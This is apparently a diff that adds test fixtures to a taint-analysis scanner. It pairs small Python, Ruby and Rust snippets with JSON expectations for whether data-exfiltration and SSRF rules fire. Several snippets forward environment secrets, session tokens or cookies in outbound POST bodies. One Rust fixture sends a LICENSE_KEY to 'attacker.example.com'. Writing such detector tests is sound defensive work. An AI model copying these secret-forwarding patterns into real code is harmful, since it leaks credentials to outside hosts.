"notes": "Dict population with env secrets, then requests.post(json=...). Container-taint round-trip must fire DATA_EXFIL on the json field."
},
{
"rule_id": "taint-unsanitised-flow",
"must_not_match": true,
"line_range": [18, 22],
"notes": "Destination URL is a fixed literal — body taint must not surface as SSRF."
}
]
}

View file

@ -0,0 +1,23 @@
import os
import requests
from flask import Flask, request
app = Flask(__name__)
# Container-taint DATA_EXFIL: a dict accumulates env-config secrets across
# keys, then is forwarded as the JSON body of an outbound POST to a fixed
# URL. The Python SSA heap model marks the dict's `Elements` slot tainted
# at every `payload[k] = ...` write; the sink-side
# `collect_tainted_sink_values` heap-loads the same slot when checking the
# `json` kwarg, so DATA_EXFIL must fire on the json field even though
# `payload` itself is not directly tainted by an Assign. Pairs with
# `httpx_async_post_data_exfil.py` (single-key dict literal — no
# container-mutation step).
@app.route('/upload-config', methods=['POST'])
def upload_config():
payload = {}
payload['api_key'] = os.environ.get('UPSTREAM_API_KEY')
payload['region'] = os.environ.get('UPSTREAM_REGION')
requests.post('https://api.internal/ingest', json=payload)
return 'ok'

View file

@ -0,0 +1,13 @@
{
"description": "Async DATA_EXFIL via httpx.AsyncClient: os.environ.get() (EnvironmentConfig — Sensitive-tier) flows into the json kwarg of an async client.post() call against a fixed URL. The receiver type resolves to HttpClient so the gated DATA_EXFIL fires via the type-qualified `HttpClient.post` matcher; the destination is hardcoded so SSRF must NOT fire.",
"tags": ["taint", "data-exfil", "httpx", "async", "type-qualified", "sensitivity-gate"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [15, 20],
"notes": "os.environ → SourceKind::EnvironmentConfig → Sensitivity::Sensitive — DATA_EXFIL fires on the json kwarg of HttpClient.post."
}
]
}

View file

@ -0,0 +1,20 @@
import os
from fastapi import FastAPI, Request
import httpx
app = FastAPI()
# Async data-exfil path: an `httpx.AsyncClient` instance dispatches a POST
# whose `json` kwarg embeds an environment-config secret. The chained-call
# normalization collapses `httpx.AsyncClient().post` to the gate matcher
# `httpx.AsyncClient.post` so the gated DATA_EXFIL fires. Source is
# Sensitivity::Sensitive (EnvironmentConfig) so DATA_EXFIL MUST fire on the
# json kwarg; the destination URL is fixed so SSRF must NOT fire.
@app.post('/sync-async')
async def sync_async(req: Request):
api_key = os.environ.get('UPSTREAM_API_KEY')
await httpx.AsyncClient().post(
'https://upstream.internal/ingest',
json={'api_key': api_key},
)
return {'ok': True}

View file

@ -0,0 +1,13 @@
{
"description": "Session-token forwarder: flask `session` (Sensitive-tier source) flows into a fixed-URL requests.post body. SSRF must NOT fire (destination is hardcoded), but Cap::DATA_EXFIL MUST fire — auth-bearing operator state is leaving the process via the outbound payload. Mirrors the JS fetch_session_forward case for Python.",
"tags": ["taint", "data-exfil", "requests", "sensitivity-gate", "session", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [12, 18],
"notes": "session.get('user_token') → SourceKind::Cookie → Sensitivity::Sensitive — DATA_EXFIL fires on the json kwarg of requests.post."
}
]
}

View file

@ -0,0 +1,18 @@
from flask import Flask, request, session
import requests
app = Flask(__name__)
# Sensitive-source forwarder: the Flask session cookie carries auth material
# and is being forwarded to a fixed analytics URL via the request body. The
# destination is hardcoded so SSRF must NOT fire, but the source is
# Sensitivity::Sensitive (session ↔ Cookie) so DATA_EXFIL MUST fire — the
# auth-bearing operator state is leaving the process via the outbound payload.
@app.route('/sync')
def sync_session():
sid = session.get('user_token')
requests.post(
'https://analytics.internal/track',
json={'session': sid},
)
return '', 204

View file

@ -0,0 +1,19 @@
{
"description": "requests.post(taintedUrl, json={fixed}) — destination-aware case for Python. URL is tainted (SSRF), body is fixed. SSRF must fire and the cross-boundary data-exfiltration class (Cap::DATA_EXFIL) must NOT fire — the two classes share the callee but cap attribution is per-position.",
"tags": ["taint", "ssrf", "requests", "destination-aware", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-unsanitised-flow",
"must_match": true,
"line_range": [13, 18],
"notes": "request.args.get('target') → requests.post(target, json={...}) — tainted URL fires SSRF."
},
{
"rule_id": "taint-data-exfiltration",
"must_not_match": true,
"line_range": [13, 18],
"notes": "Body json kwarg is a fixed literal — DATA_EXFIL must NOT fire on this site (regression guard for per-cap attribution)."
}
]
}

View file

@ -0,0 +1,18 @@
from flask import Flask, request
import requests
app = Flask(__name__)
# URL-only taint: the destination URL is attacker-controlled but the body is
# a fixed literal. SSRF must fire on the URL flow. DATA_EXFIL must NOT fire
# because no body kwarg carries taint (regression guard for per-cap
# attribution — the two classes share the callee but cap routing is per
# argument position).
@app.route('/proxy', methods=['POST'])
def proxy():
target = request.args.get('target')
requests.post(
target,
json={'event': 'proxy_call'},
)
return '', 204

View file

@ -0,0 +1,13 @@
{
"description": "requests.post() with a fixed destination URL and a plain user-input body (request.form). DATA_EXFIL must NOT fire: plain user input echoed back via an outbound body is not a cross-boundary disclosure (the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL). Pairs with requests_post_session_token.py to assert per-tier routing for Python.",
"tags": ["taint", "data-exfil", "requests", "sensitivity-gate", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_not_match": true,
"line_range": [13, 19],
"notes": "Body source is plain user input (request.form → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources (cookies, sessions, headers, env) — plain user input echoed into a request body is not data exfiltration."
}
]
}

View file

@ -0,0 +1,19 @@
from flask import Flask, request
import requests
app = Flask(__name__)
# Plain user input echoed back into a fixed-URL request body. The destination
# is hardcoded so SSRF must NOT fire. DATA_EXFIL must NOT fire either: the
# source is Sensitivity::Plain (request.form is raw user input) and the
# source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL.
# Echoing the user's own data back to telemetry is not a cross-boundary
# disclosure — it is exactly what the API gateway pattern does.
@app.route('/forward', methods=['POST'])
def forward_message():
payload = request.form.get('message')
requests.post(
'https://telemetry.internal/forward',
data={'message': payload},
)
return '', 204

View file

@ -0,0 +1,13 @@
{
"description": "Net::HTTP.post(uri, body) with the body interpolating a session cookie value. Destination is fixed so SSRF must NOT fire on the URL flow, but DATA_EXFIL MUST fire — request.cookies is Sensitivity::Sensitive and the auth-bearing operator state is leaving the process via the outbound payload.",
"tags": ["taint", "data-exfil", "net-http", "sensitivity-gate", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [4, 7],
"notes": "request.cookies[:auth_token] → SourceKind::Cookie → Sensitivity::Sensitive — DATA_EXFIL fires on the body of Net::HTTP.post."
}
]
}

View file

@ -0,0 +1,8 @@
require 'net/http'
require 'uri'
def forward_session(request) # positive case: the paired expectation requires taint-data-exfiltration to fire
sid = request.cookies[:auth_token] # body source: cookie value
uri = URI('https://analytics.internal/track') # destination is a string literal
Net::HTTP.post(uri, "session=#{sid}") # cookie value interpolated into the POST body
end

View file

@ -0,0 +1,13 @@
{
"description": "RestClient.post() with a fixed destination URL and a plain user-input body (params[:message]). DATA_EXFIL must NOT fire: the body source is Sensitivity::Plain and the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL. Pairs with data_exfil_net_http_post.rb to assert per-tier routing for Ruby.",
"tags": ["taint", "data-exfil", "rest-client", "sensitivity-gate", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_not_match": true,
"line_range": [3, 9],
"notes": "Body source is plain user input (params → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources — plain user input echoed into a request body is not data exfiltration."
}
]
}

View file

@ -0,0 +1,9 @@
require 'rest-client'
def forward_message(params) # negative case: the paired expectation requires taint-data-exfiltration NOT to fire
message = params[:message] # body source: plain request parameter
RestClient.post(
'https://telemetry.internal/forward', # destination is a string literal
{ message: message }.to_json # request parameter serialized as the JSON body
)
end

View file

@ -0,0 +1,31 @@
{
"description": "DATA_EXFIL: env::var flows to hyper::Request::builder().body() chain.",
"tags": ["taint", "data_exfil", "hyper"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"severity": null,
"must_match": true,
"line_range": [5, 12],
"evidence_contains": [],
"notes": "env-config secret flows into hyper Request::builder().body() body-bind, fires DATA_EXFIL"
},
{
"rule_id": "rs.quality.unwrap",
"severity": null,
"must_match": true,
"line_range": [5, 7],
"evidence_contains": [],
"notes": ".unwrap() on env::var Result"
},
{
"rule_id": "rs.quality.unwrap",
"severity": null,
"must_match": true,
"line_range": [7, 12],
"evidence_contains": [],
"notes": ".unwrap() on Request::builder().body() Result"
}
]
}

View file

@ -0,0 +1,12 @@
// DATA_EXFIL: env-config flows into hyper Request::builder().body(payload).
// The body-bind step on the request builder is itself the leak point;
// the `Request::builder.body` chain matcher (with `.unwrap` peel) fires
// DATA_EXFIL on the build statement.
fn exfil_hyper() {
let secret = std::env::var("LICENSE_KEY").unwrap();
let _req = hyper::Request::builder()
.method("POST")
.uri("https://attacker.example.com/collect")
.body(secret)
.unwrap();
}

View file

@ -0,0 +1,19 @@
{
"description": "Async DATA_EXFIL parity: client.post(URL).body(secret).send().await preserves the cap split identically to the synchronous .send() case. The chained-call normalization peels the trailing .await so the body-binding matcher resolves; awaiting cannot strip taint.",
"tags": ["taint", "data-exfil", "reqwest", "async", "await", "edge-case"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [9, 14],
"notes": "env::var secret → .body(secret).send().await must fire DATA_EXFIL on the body channel."
},
{
"rule_id": "rs.quality.unwrap",
"must_match": true,
"line_range": [9, 10],
"notes": ".unwrap() on env::var Result"
}
]
}

Some files were not shown because too many files have changed in this diff Show more